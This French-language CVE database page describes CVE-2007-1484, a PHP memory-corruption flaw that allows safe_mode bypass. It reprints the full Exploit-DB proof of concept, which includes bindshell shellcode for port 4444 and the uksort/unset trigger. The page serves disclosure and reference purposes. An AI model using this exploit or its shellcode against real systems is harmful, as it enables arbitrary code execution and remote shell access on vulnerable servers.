CVE-2007-1484 : Détail

CVE-2007-1484

0.04%V3
Local
2007-03-16 20:00 +00:00
2007-04-12 07:00 +00:00

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.
Gestion des alertes

Descriptions

The array_user_key_compare function in PHP 4.4.6 and earlier, and 5.x up to 5.2.1, makes erroneous calls to zval_dtor, which triggers memory corruption and allows local users to bypass safe_mode and execute arbitrary code via a certain unset operation after array_user_key_compare has been called.

Informations

Metrics

Metric Score Sévérité CVSS Vecteur Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 3499

Date de publication : 2007-03-15 23:00 +00:00
Auteur : Stefan Esser
EDB Vérifié : Yes

<?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ // // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ // // |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| // // // // Proof of concept code from the Hardened-PHP Project // // (C) Copyright 2007 Stefan Esser // // // //////////////////////////////////////////////////////////////////////// // PHP 4/5 - array_user_key_compare() ZVAL dtor exploit // //////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion. die("REMOVE THIS LINE"); // You can put in any shellcode you want. Just make sure that the // shellcode string starts with enough NOP space // NOPSPACE $shellcode = str_repeat(chr(0x90), 710); // A bindshell on port 4444 generated by Metsploit $shellcode .= "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46". "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f". "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6". "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06". "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc". "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d". "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65"; $arr = array(str_repeat("A", 39) => 1, "B" => 1); function array_compare(&$key1, &$key2) { $GLOBALS['a'] = &$key2; unset($key2); return 1; } uksort($arr, "array_compare"); $x=array($shellcode => 1); $a[8*4+0] = $a[6*4+0]; $a[8*4+1] = chr(ord($a[6*4+1])+2); // <--- This only works for Little Endian $a[8*4+2] = $a[6*4+2]; $a[8*4+3] = $a[6*4+3]; unset($x); ?> # milw0rm.com [2007-03-16]

Products Mentioned

Configuraton 0

Php>>Php >> Version To (including) 4.4.6

Php>>Php >> Version From (including) 5.0.0 To (including) 5.2.1

References

http://www.securityfocus.com/bid/22990
Tags : vdb-entry, x_refsource_BID
http://www.vupen.com/english/advisories/2007/2732
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/25056
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/24542
Tags : third-party-advisory, x_refsource_SECUNIA
http://security.gentoo.org/glsa/glsa-200705-19.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://us2.php.net/releases/4_4_7.php
Tags : x_refsource_CONFIRM
http://www.ubuntu.com/usn/usn-455-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://us2.php.net/releases/5_2_2.php
Tags : x_refsource_CONFIRM
http://www.securityfocus.com/bid/25159
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/25445
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/25057
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/26235
Tags : third-party-advisory, x_refsource_SECUNIA
Cliquez sur le bouton à gauche (OFF), pour autoriser l'inscription de cookie améliorant les fonctionnalités du site. Cliquez sur le bouton à gauche (Tout accepter), pour ne plus autoriser l'inscription de cookie améliorant les fonctionnalités du site.